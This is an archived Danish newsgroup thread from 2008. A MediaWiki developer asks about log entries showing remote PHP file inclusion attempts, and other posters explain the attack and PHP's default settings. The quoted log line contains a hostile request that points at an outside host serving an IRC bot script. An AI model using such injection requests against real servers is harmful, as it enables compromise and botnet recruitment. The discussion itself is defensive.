/ Forside / Teknologi / Udvikling / PHP / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
PHP
#NavnPoint
rfh 3959
natmaden 3372
poul_from 3310
funbreak 2700
stone47 2230
Jin2k 1960
Angband 1743
Bjerner 1249
refi 1185
10  Interkril.. 1146
PHP angreb
Fra : Anders Wegge Jakobse~


Dato : 06-03-08 02:08


X-post til dk.edb.sikkerhed og dk.edb.internet.webdesign.serverside.php
Follow-up til dk.edb.sikkerhed

For tiden bliver min wiki temmeligt hårdt angrebet af requests som:

69.156.118.78 - - [02/Mar/2008:23:39:18 +0100]
"GET /wiki/MediaWiki_customizations%20http://weddingparty.eclub.lv/images? HTTP/1.0"
301 - "-" "Mozilla/5.0 (X11;

Jeg har af ren og skær nysgerrighed set efter hvad der er på den URL,
og det viser sig at være en php IRC client, ca. efter samme princip
som den der er i <http://pastebin.com/fbccb9f2>.

Det virker ret oplagt at man er på spanden, hvis man først afvikler
den, men jeg lurer lidt på hvad det er for et sikkerhedshul den
forsøger at ramme. Jeg kan ikke i min vildeste fantasi forestille mig
at der er nogen der frivilligt skriver kode der afvikler en tilfældig
URL. Så hvad er det egentlig man skal være opmærksom på her.

Og noget helt andet: Jeg mindes ikke at have set noget tilsvarende
før, så er det bare mig der er uheldig for tiden, eller er folk
generelt ved at udvide deres botnet?

--
// Wegge
<http://geowiki.wegge.dk/wiki/Forside> - Alt om geocaching
Bruger du den gratis spamfighther ser jeg kun dine indlæg *EN* gang.

 
 
Stig Johansen (06-03-2008)
Kommentar
Fra : Stig Johansen


Dato : 06-03-08 08:09

Anders Wegge Jakobsen wrote:

> X-post til dk.edb.sikkerhed og dk.edb.internet.webdesign.serverside.php
> Follow-up til dk.edb.sikkerhed

Ditto, da det nok også er PHP relevant.

> "GET
> /wiki/MediaWiki_customizations%20http://weddingparty.eclub.lv/images?

Tak for linket, den er røget i arkivet til engang der er tid til at kigge.

> Det virker ret oplagt at man er på spanden, hvis man først afvikler
> den, men jeg lurer lidt på hvad det er for et sikkerhedshul den
> forsøger at ramme. Jeg kan ikke i min vildeste fantasi forestille mig
> at der er nogen der frivilligt

Frivilligt - nej, det tror jeg heller ikke, og er lige så nysgerrig som dig.

> skriver kode der afvikler en tilfældig
> URL. Så hvad er det egentlig man skal være opmærksom på her.

Det kunne jeg pgså godt tænke mig at vide, og det er nok et spørgsmål til
PHP folket:
Hvordan er mekanikken bag afvikling af remote PHP kode a la
http://domain.tld??someparm=http://scriptlocation.tld/somedir/somemore?

>
> Og noget helt andet: Jeg mindes ikke at have set noget tilsvarende
> før, så er det bare mig der er uheldig for tiden,

Det er i hvertfald set før, diverse PhpBB attacks, men jeg kender ikke PHP
godt nok til at vide hvordan det de kom ind.

> eller er folk
> generelt ved at udvide deres botnet?

Det tror jeg roligt du kan stole på, der er *masser* af PHP enblet servere
out there.
Men hvorvidt de er vulnerable by default eller ej, skal jeg ikke kunne
udtale mig om.

--
Med venlig hilsen
Stig Johansen

Johan Holst Nielsen (06-03-2008)
Kommentar
Fra : Johan Holst Nielsen


Dato : 06-03-08 09:11

Anders Wegge Jakobsen wrote:
> X-post til dk.edb.sikkerhed og dk.edb.internet.webdesign.serverside.php
> Follow-up til dk.edb.sikkerhed
>
> For tiden bliver min wiki temmeligt hårdt angrebet af requests som:
>
> 69.156.118.78 - - [02/Mar/2008:23:39:18 +0100]
> "GET /wiki/MediaWiki_customizations%20http://weddingparty.eclub.lv/images? HTTP/1.0"
> 301 - "-" "Mozilla/5.0 (X11;
>
> Jeg har af ren og skær nysgerrighed set efter hvad der er på den URL,
> og det viser sig at være en php IRC client, ca. efter samme princip
> som den der er i <http://pastebin.com/fbccb9f2>.
>

Det ligner jo blot et dårligt forsøg på code injection. (Hvilket du
sikkert er klar over :))

Der står lidt uddybende om bot'en på:
http://ecks90.com/?id=42

Jeg kender ikke umiddeltbart noget sikkerhedshul i MediaWiki - men kan
ikke afvise der i (ældre?) versioner har været mulighed for code injection.

--
Johan Holst Nielsen
Freelance PHP Developer - http://phpgeek.dk

Anders Wegge Jakobse~ (06-03-2008)
Kommentar
Fra : Anders Wegge Jakobse~


Dato : 06-03-08 19:49

Johan Holst Nielsen <spam@phpgeek.dk> writes:

> Det ligner jo blot et dårligt forsøg på code injection. (Hvilket du
> sikkert er klar over :))

Jeg var ikke klar over at det var sådan man kalder den slags, men jeg
kunne godt regne formålet ud.

Jeg savner dog stadig lidt viden om hvad problematikken egentlig
er. Nærmere bestemt hvilken form for sjusket kodning, der kan medføre
at man afvikler kode fra vilkårlige steder?

> Der står lidt uddybende om bot'en på:
> http://ecks90.com/?id=42

> Jeg kender ikke umiddeltbart noget sikkerhedshul i MediaWiki - men
> kan ikke afvise der i (ældre?) versioner har været mulighed for code
> injection.

Vi (Jeg er MediaWiki udvikler, men ikke hvad angår sikkerhed) har
haft en del XSS og HTML injection, men ikke noget code injection, så
vidt jeg ved af.

--
// Wegge
<http://geowiki.wegge.dk/wiki/Forside> - Alt om geocaching
Bruger du den gratis spamfighther ser jeg kun dine indlæg *EN* gang.

Stig Johansen (07-03-2008)
Kommentar
Fra : Stig Johansen


Dato : 07-03-08 11:47

Anders Wegge Jakobsen wrote:

> Jeg savner dog stadig lidt viden om hvad problematikken egentlig
> er.

[snip]

> Vi (Jeg er MediaWiki udvikler, men ikke hvad angår sikkerhed) har
> haft en del XSS og HTML injection, men ikke noget code injection, så
> vidt jeg ved af.

Michael har givet et link til sjusket kode.

Men de her bot'er går ikke målrettet efter MediaWiki (dig) eller andet. De
prøver alle steder.

I forbindelse med noget undersøgelse af nogle log's, har de prøver at lave
PHP injection på ASP sider(?).

Så det er simpelthen brute force på alt og alle.

--
Med venlig hilsen
Stig Johansen

Michael Rasmussen (06-03-2008)
Kommentar
Fra : Michael Rasmussen


Dato : 06-03-08 09:25

On Thu, 06 Mar 2008 09:10:30 +0100
Johan Holst Nielsen <spam@phpgeek.dk> wrote:

>
> Det ligner jo blot et dårligt forsøg på code injection. (Hvilket du
> sikkert er klar over :))
>
En "normal" PHP installation er vel heller ikke konfigureret til at
tillade remote afvikling af PHP! Som default er det ihvertfald
deaktiveret i PHP 5.2.

--
Hilsen/Regards
Michael Rasmussen
http://keyserver.veridis.com:11371/pks/lookup?op=get&search=0xE3E80917
A computer is like air conditioning: it becomes useless when you open
windows.


Stig Johansen (06-03-2008)
Kommentar
Fra : Stig Johansen


Dato : 06-03-08 16:19

Michael Rasmussen wrote:

> En "normal" PHP installation er vel heller ikke konfigureret til at
> tillade remote afvikling af PHP! Som default er det ihvertfald
> deaktiveret i PHP 5.2.

Jeg fandt den her:
<http://en.wikipedia.org/wiki/Remote_File_Inclusion>

Så det ser ud som om, at før v.5 har en 'normal' konfiguration tilladelse
til at afvikle remote code.

--
Med venlig hilsen
Stig Johansen

Michael Rasmussen (06-03-2008)
Kommentar
Fra : Michael Rasmussen


Dato : 06-03-08 19:57

On Thu, 06 Mar 2008 19:48:43 +0100
Anders Wegge Jakobsen <wegge@obelix.wegge.dk> wrote:

>
> Vi (Jeg er MediaWiki udvikler, men ikke hvad angår sikkerhed) har
> haft en del XSS og HTML injection, men ikke noget code injection, så
> vidt jeg ved af.
>
Denne blog ridser problematikken udmærket op:
http://www.ajaxapp.com/2007/11/29/beware-of-remote-code-injection-exploit-in-php/

--
Hilsen/Regards
Michael Rasmussen
http://keyserver.veridis.com:11371/pks/lookup?op=get&search=0xE3E80917
A computer is like air conditioning: it becomes useless when you open
windows.


Søg
Reklame
Statistik
Spørgsmål : 177558
Tips : 31968
Nyheder : 719565
Indlæg : 6408924
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste